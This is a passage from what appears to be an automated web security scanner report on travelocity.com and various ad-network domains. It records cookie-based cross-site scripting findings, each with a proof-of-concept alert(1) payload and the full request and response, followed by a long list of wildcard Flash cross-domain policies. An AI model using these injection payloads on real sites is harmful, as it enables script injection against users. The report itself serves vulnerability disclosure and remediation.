User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=2139d"%3balert(1)//42f8578f032

rememberCheck=us&selectedFlag=us&continue=Continue

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176603
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:57 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
e",maxRetries:10,sVSTrackUrl:"http://travel.travelocity.com/___waseq.img",terms_link:{url:"http://www.travelocity.com/info/info_popup/0,,TRAVELOCITY:EN|TERMS_WINDOW,00.html",width:500,height:400},SID:"2139d";alert(1)//42f8578f032",JSID:"",servicetag:"TRAVELOCITY"};Subscriptions.PopupConfig = {urls:{SignUpPopup:"http://www.travelocity.com/subscription-management/submgmt-popup"},height:450}; Subscriptions.SignupConfig.JSID = G
...[SNIP]...

4.434. http://www.travelocity.com/resolve/default [TVLY_GEO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /resolve/default

Issue detail

The value of the TVLY_GEO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58978'%3balert(1)//89a7d5f99fb was submitted in the TVLY_GEO cookie. This input was echoed as 58978';alert(1)//89a7d5f99fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /resolve/default HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||58978'%3balert(1)//89a7d5f99fb; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102

rememberCheck=us&selectedFlag=us&continue=Continue

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176582
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:42 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
tDeals, function(){
           jQuery(document).bind('travelDeals:ready', function(){
               new deals.VacationDeals({
                   cookies: {
                       LastShopCookie : '',
                       PrefLocCookie : '',
                       geoCookie : '|||||58978';alert(1)//89a7d5f99fb'
                   }
               });
           });
       });
       
       
           var dDeals = ["http://i.travelpn.com.edgesuite.net/js/hp-dashing-deal.js"];
           jQuery.tvly.loadScript(dDeals, function(){
               jQuery(document).bind('DealsOfTheDay
...[SNIP]...

4.435. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [drft cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

Issue detail

The value of the drft cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35267"-alert(1)-"a7305f10e3e was submitted in the drft cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: drft=33637923-4b56-4634-b850-17368e8cd43235267"-alert(1)-"a7305f10e3e; JSESSIONID=CE82F85007B28AF8167D5428864C47CE.p0522; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; drft=33637923-4b56-4634-b850-17368e8cd432; mbox=session#1317600481056-80236#1317605007|PC#1317600481056-80236.19#1318812747|check#true#1317603207

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=E0293EF4FDC03448F6E9E71AAA07FEC8.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2429

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd43235267"-alert(1)-"a7305f10e3e", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   ppi:"9c640959-323a-4cfe-96b3-8b0f1864ec3a", // page impression
...[SNIP]...

5. Flash cross-domain policy
There are 65 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://a.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 17:14:24 GMT
Accept-Ranges: bytes
Date: Sun, 02 Oct 2011 23:51:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

5.2. http://ad-dc2.adtech.de/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-dc2.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-dc2.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

5.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 02 Oct 2011 23:51:36 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.4. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 02 Oct 2011 23:53:01 GMT
Content-Type: text/xml;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:53:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.5. http://ad4.liverail.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: ad4.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:34 GMT
ETag: "3161345513"
Last-Modified: Mon, 26 Sep 2011 21:54:57 GMT
Server: lighttpd/1.4.29-devel-4:6M
Content-Length: 269
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1571"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 02 Oct 2011 23:49:38 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

5.7. http://adserver.adtech.de/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

5.8. http://aka-cdn-ns.adtech.de/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://aka-cdn-ns.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aka-cdn-ns.adtech.de

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 04 Apr 2011 13:01:42 GMT
Content-Type: text/xml
Cache-Control: max-age=498855
Expires: Sat, 08 Oct 2011 18:24:12 GMT
Date: Sun, 02 Oct 2011 23:49:57 GMT
Content-Length: 111
Connection: close

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

5.9. http://aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a94"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Sun, 02 Oct 2011 23:49:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

5.10. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:50:07 GMT
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.11. http://bcp.crwdcntrl.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:09 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Wed, 21 Sep 2011 13:44:24 GMT
ETag: "1420486-ba-4ad73c624fe00"
Accept-Ranges: bytes
Content-Length: 186
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>

5.12. http://beacon.securestudies.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:52:41 GMT
Date: Sun, 02 Oct 2011 23:52:41 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.13. http://c.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.14. http://cacheserve.williamhill.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cacheserve.williamhill.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cacheserve.williamhill.com

Response

HTTP/1.1 200 OK
Date: Sun, 25 Sep 2011 15:09:10 GMT
Server: MII-APC/2.1.10
Last-Modified: Tue, 29 Mar 2011 11:40:16 GMT
Content-Type: application/xml
ETag: W/"204-1301398816000"
Age: 636190
Via: 1.1 sjc005158 (MII-APC/2.1)
x-mii-cache-hit: 1, auth=1
Content-Length: 204
Warning: 113 sjc005158 "Heuristic expiration" "Sun, 25 Sep 2011 15:09:10 GMT"
Via: 1.1 sjc005159 (MII-APC/2.1)
Via: 1.1 sjc005161 (MII-APC/2.1)
Expires: Sun, 09 Oct 2011 23:52:20 GMT
Cache-Control: max-age=1240990
X-Pb-Mii: Powered by Mirror Image Internet
Via: 1.1 sjc005106 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

5.15. http://cas.criteo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sun, 02 Oct 2011 23:49:33 GMT
Expires: Wed, 26 Sep 2012 23:49:33 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.16. http://cdn.flashtalking.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.flashtalking.com

Response

HTTP/1.0 200 OK
x-amz-id-2: x91gS7A+mOoQBJMpsSvpSjs8Kl4JSjw9nBBYAVCZHtBqqxph0+xgdMahmBkl+KZl
x-amz-request-id: DD2B4B27E613A7C4
Last-Modified: Mon, 22 Aug 2011 09:48:30 GMT
ETag: "86f55de532e6feae15623e7a599dfb87"
Content-Type: application/xml
Content-Length: 322
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:53:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://video.flashtalking.com -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.17. http://cdn.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 02 Oct 2011 23:53:04 GMT
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.18. http://d.tradex.openx.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "88c2d-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.19. http://dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.20. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 66083
Date: Mon, 03 Oct 2011 01:02:36 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.21. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.22. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

